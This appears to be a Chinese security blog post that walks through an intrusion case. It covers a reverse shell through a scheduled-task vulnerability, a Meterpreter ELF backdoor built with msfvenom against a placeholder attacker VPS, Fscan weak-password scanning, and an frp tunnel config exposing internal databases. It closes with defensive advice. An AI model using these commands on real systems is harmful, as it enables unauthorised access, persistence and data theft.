通过框架计划任务漏洞反弹shell获取主机权限并突破内网案例分析
ccwgpt 2024-10-07 06:51 34 浏览 0 评论
大家好,我是yangyang.今天分享一个经典攻击案例.
流程
通过**框架计划任务漏洞反弹shell获取主机权限VPS获得shell突破至内网植入后门test.elf上线MSF权限为ROOT,上传Fscan,Fscan扫描到4台数据库账号密码均为弱口令上传frp搭建隧道连接数据库.能否详细介绍这个攻击流程以及设计的软件
分析
- 框架计划任务漏洞反弹shell获取主机权限:
- 框架计划任务漏洞:许多框架和软件有计划任务功能,如果存在漏洞,可以通过利用这些漏洞执行恶意代码。
- 反弹shell:攻击者在目标主机上执行恶意代码,使得目标主机与攻击者的VPS(虚拟专用服务器)建立反向连接,从而获取目标主机的控制权。常用工具:Metasploit Framework (MSF),Netcat。
- VPS获得shell突破至内网植入后门test.elf上线MSF权限为ROOT:
- VPS获得shell:VPS上运行监听器,等待目标主机连接,成功后获得shell。
- 突破至内网:在获得目标主机控制权后,通过该主机进一步渗透内网其他设备。
- 植入后门:上传并运行恶意程序(如test.elf),让攻击者能长期访问该设备。使用Metasploit生成和管理后门。
- 上线MSF:后门连接到Metasploit服务器,获得ROOT权限。
- 上传Fscan扫描到4台数据库账号密码均为弱口令:
- Fscan:一种多功能网络扫描工具,用于发现网络中的设备和服务,并检测常见漏洞。
- 弱口令扫描:扫描内网中设备,尝试默认或常见的弱口令,获得数据库访问权限。
- 上传frp搭建隧道连接数据库:
- frp (Fast Reverse Proxy):一种高性能的反向代理应用,支持将内网服务通过外网访问。
- 搭建隧道:在内网设备上运行frp客户端,通过VPS上的frp服务器建立隧道,使得攻击者能够从外部直接访问内网数据库。
设计的软件工具
- Metasploit Framework:一个用于开发和执行漏洞利用代码的开源工具,广泛用于渗透测试和攻击模拟。它包含大量的漏洞利用模块、后门植入工具以及其他渗透测试工具。
- Netcat:被称为“网络瑞士军刀”,用于读取和写入网络连接,是创建反向shell的常用工具。
- Fscan:一款多功能的网络扫描工具,可以快速扫描端口、服务、漏洞和弱口令等。
- frp (Fast Reverse Proxy):一个用于通过防火墙和NAT穿透的反向代理工具,适合用于内网服务的外网访问。
详细攻击流程
- 利用框架漏洞获取shell:
- 攻击者识别目标框架的计划任务漏洞,通过漏洞利用模块发送恶意payload。
- 目标主机执行payload,启动反向shell连接到攻击者的VPS。
- VPS获得shell并提升权限:
- 攻击者在VPS上接收反向shell,获得目标主机的初始访问权限。
- 使用提权工具或漏洞,提升权限至ROOT。
- 内网渗透和后门植入:
- 使用Metasploit或其他工具生成后门程序(test.elf),上传并运行在目标主机上。
- 后门程序上线Metasploit,攻击者获得长期访问权限。
- 扫描内网数据库:
- 上传并运行Fscan,扫描内网中的设备和服务,找到4台数据库。
- 尝试默认和常见弱口令,成功登录数据库。
- 搭建frp隧道:
- 在目标主机上运行frp客户端,通过VPS上的frp服务器建立隧道。
- 攻击者通过隧道直接访问内网数据库,进行数据窃取或进一步的渗透活动。
复盘整理流程
1.1 计划任务漏洞简介
许多框架和软件具有计划任务功能,用于执行定时任务。然而,这些任务功能如果未妥善配置或存在漏洞,可能被攻击者利用来执行恶意代码。常见的漏洞类型包括命令注入、任意代码执行等。
1.2 漏洞利用
攻击者首先识别目标框架的计划任务漏洞。利用这些漏洞,攻击者可以发送恶意payload,使目标主机执行恶意代码,从而启动一个反向shell连接。
1.3 工具:Metasploit
Metasploit是一个广泛使用的渗透测试框架,包含大量漏洞利用模块。以下是利用Metasploit启动反向shell的步骤:
use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST <攻击者的VPS IP> set LPORT <监听端口> exploit
复制代码
2. 反向shell和权限提升
2.1 反向shell
反向shell是一种技术,目标主机主动连接攻击者的机器,从而绕过防火墙的入站规则。攻击者在VPS上监听特定端口,等待目标主机的连接。
2.2 权限提升
获得初始访问权限后,攻击者使用提权工具或利用系统漏洞,提升权限至ROOT。常用提权工具包括LinPEAS、Dirty COW等。
3. 内网渗透和后门植入
3.1 后门植入
后门是一种长期保持对目标主机控制的恶意软件。攻击者使用Metasploit生成后门程序(如test.elf),上传并运行在目标主机上。
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<攻击者的VPS IP> LPORT=<监听端口> -f elf > test.elf
3.2 上线MSF
后门程序启动后,与Metasploit服务器建立连接,攻击者获得长期访问权限。
4. 扫描内网数据库
4.1 工具:Fscan
Fscan是一款多功能网络扫描工具,可以快速扫描端口、服务、漏洞和弱口令等。攻击者使用Fscan扫描内网设备,找到4台数据库。
fscan -h <目标IP段> -p <端口> -weak
4.2 弱口令攻击
扫描结果显示4台数据库存在弱口令,攻击者尝试默认或常见弱口令,成功登录数据库。
5. 建立隧道连接数据库
5.1 工具:frp (Fast Reverse Proxy)
frp是一种高性能的反向代理应用,支持将内网服务通过外网访问。攻击者在目标主机上运行frp客户端,通过VPS上的frp服务器建立隧道,使得攻击者能够从外部直接访问内网数据库。
5.2 frp配置
在目标主机上创建frp配置文件,配置内网数据库的隧道:
[common] server_addr = <攻击者的VPS IP> server_port = 7000 [db_tunnel] type = tcp local_ip = 127.0.0.1 local_port = 3306 remote_port = 6000
启动frp客户端:
frpc -c frpc.ini
在VPS上,攻击者通过frp隧道连接数据库:
mysql -h 127.0.0.1 -P 6000 -u <用户名> -p<密码>
总结
本文通过一个具体的攻击案例,详细讲解了如何利用框架计划任务漏洞反弹shell获取主机权限,突破内网,植入后门,扫描弱口令数据库并建立隧道连接数据库。理解这些技术对于网络安全防御和渗透测试有重要意义,但请注意,未经授权的入侵和数据窃取是违法行为。
安全建议
- 定期更新和修补系统和应用程序:及时修补已知漏洞,防止攻击者利用。
- 使用强密码和多因素认证:防止弱口令攻击。
- 监控和审计:定期监控系统日志,发现异常行为。
- 网络隔离和最小权限原则:限制内网设备的访问权限,防止攻击者横向移动。
相关推荐
- 用Deepseek扩写土木工程毕业论文实操指南
-
用Deepseek扩写毕业论文实操指南一、前期准备整理现有论文初稿/提纲列清楚论文核心框架(背景、现状、意义、方法、数据、结论等)梳理好关键文献,明确核心技术路线二、Deepseek扩写核心思路...
- 985学霸亲授,DeepSeek也能绘6大科研图表,5分钟就出图
-
在实验数据处理中,高效可视化是每个科研人的必修课。传统绘图软件操作复杂、耗时费力,而智能工具DeepSeek的出现彻底改变了这一现状。本文将详解如何用DeepSeek一键生成六大科研常用图表,从思维导...
- AI写论文刷屏?大学生正在丢掉的思考力
-
一、宿舍深夜:当论文变成"Ctrl+C+V"凌晨两点的大学宿舍,小王对着电脑屏幕叹气。本该三天前开始写的近代史论文,此刻还一片空白。他熟练打开某AI写作网站,输入"论五四运动的...
- Grok在辅助论文写作上能不能既“聪明”又“可怕”?!
-
AcademicIdeas-学境思源AI初稿写作随着人工智能技术的飞速发展,论文写作这一学术任务正迎来新的助力。2025年2月18日,美国xAI公司推出了备受瞩目的Grok3模型,其创始人埃隆·...
- 大四论文沟通场景!音频转文字难题听脑AI来化解
-
大四学生都知道,写论文时和导师沟通修改意见,简直是“过关斩将”。电话、语音沟通完,想把导师说的修改方向、重点要求记下来,麻烦事儿可不少。手写记不全,用普通录音转文字工具,转完还得自己慢慢找重点,稍不注...
- 论文写作 | 技术路线图怎么画?(提供经典优秀模板参考)
-
技术路线图是一种图表或文字说明,用于描述研究目标、方法和实施计划。它展示了研究的整体框架和步骤,有助于读者理解研究的逻辑和进展。在课题及论文中,技术路线图是常见的一部分,甚至是一个类似心脏一样的中枢器...
- 25年信息系统项目管理师考试第2批论文题目写作建议思路框架
-
25年信息系统项目管理师考试第2批论文题目写作建议思路框架--马军老师
- 微信购物应尽快纳入法律框架(微信购物管辖)
-
符向军近日,甘肃省工商行政管理局发布《2016年上半年信息分析报告》。报告显示,微信网购纠纷迅猛增长,网络购物投诉呈上升趋势。投诉的主要问题有出售的商品质量不过关、消费者通过微信付款后对方不发货、购买...
- 泛珠三角区域网络媒体与腾讯微信签署《战略合作框架协议》
-
新海南客户端、南海网7月14日消息(记者任桐)7月14日上午,参加第四届泛珠三角区域合作网络媒体论坛的区域网络媒体负责人及嘉宾一行到腾讯微信总部座谈交流,并签署《战略合作框架协议》(以下简称《框架协...
- 离线使用、植入微信-看乐心Mambo手环如何打破框架
-
从2014年开始智能手环就成功进入人们的生活,至今已经演变出数据监测、信息推送、心率监测等诸多五花八门的功能,人们选择智能手环并不指望其能够改变身体健康情况,更多的是通过数据来正视自身运动情况和身体健...
- 华专网络:如何零基础制作一个网站出来?
-
#如何零基础制作一个网站出来?#你是不是觉得网站建设很复杂,觉得自己是小白,需求不明确、流程搞不懂、怕被外包公司坑……这些问题我都懂!今天华专网络就用大白话给你捋清楚建站的全流程,让你轻松get网站制...
- WAIC2024丨明日上午9点,不见不散!共同探讨智能社会与全球治理框架
-
大咖云集,硕果闪耀WAIC2024世界人工智能大会智能社会论坛将于7月5日9:00-12:00与你相约直播间WAIC2024上海杨浦同济大学哔哩哔哩多平台同步直播探讨智能社会与全球治理框架WAIC...
- 约基奇:森林狼换来戈贝尔时大家都在嘲笑 他们的阵容框架很不错
-
直播吧5月4日讯西部季后赛半决赛,掘金将迎战森林狼,约基奇赛前接受采访。约基奇说道:“当蒂姆-康纳利(森林狼总经理、前掘金总经理&曾选中约基奇)做了那笔交易(换来戈贝尔)时,每个人都在嘲笑他...
- 视频号带货为什么一个流量都没有?顶级分析框架送给你
-
视频号带货为什么一个流量都没有?遇到问题,一定是步步来分析内容,视频号带货一个流量都没有,用另外一个意思来讲,就可以说是零播放。为什么视频号带货一个流量都没有?跟你说再多,都不如来个分析框架。1、是否...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- MVC框架 (46)
- spring框架 (46)
- 框架图 (58)
- flask框架 (53)
- quartz框架 (51)
- abp框架 (47)
- jpa框架 (47)
- laravel框架 (46)
- springmvc框架 (49)
- 分布式事务框架 (65)
- scrapy框架 (56)
- shiro框架 (61)
- 定时任务框架 (56)
- java日志框架 (61)
- JAVA集合框架 (47)
- grpc框架 (55)
- ppt框架 (48)
- 内联框架 (52)
- winform框架 (46)
- gui框架 (44)
- cad怎么画框架 (58)
- ps怎么画框架 (47)
- ssm框架实现登录注册 (49)
- oracle字符串长度 (48)
- oracle提交事务 (47)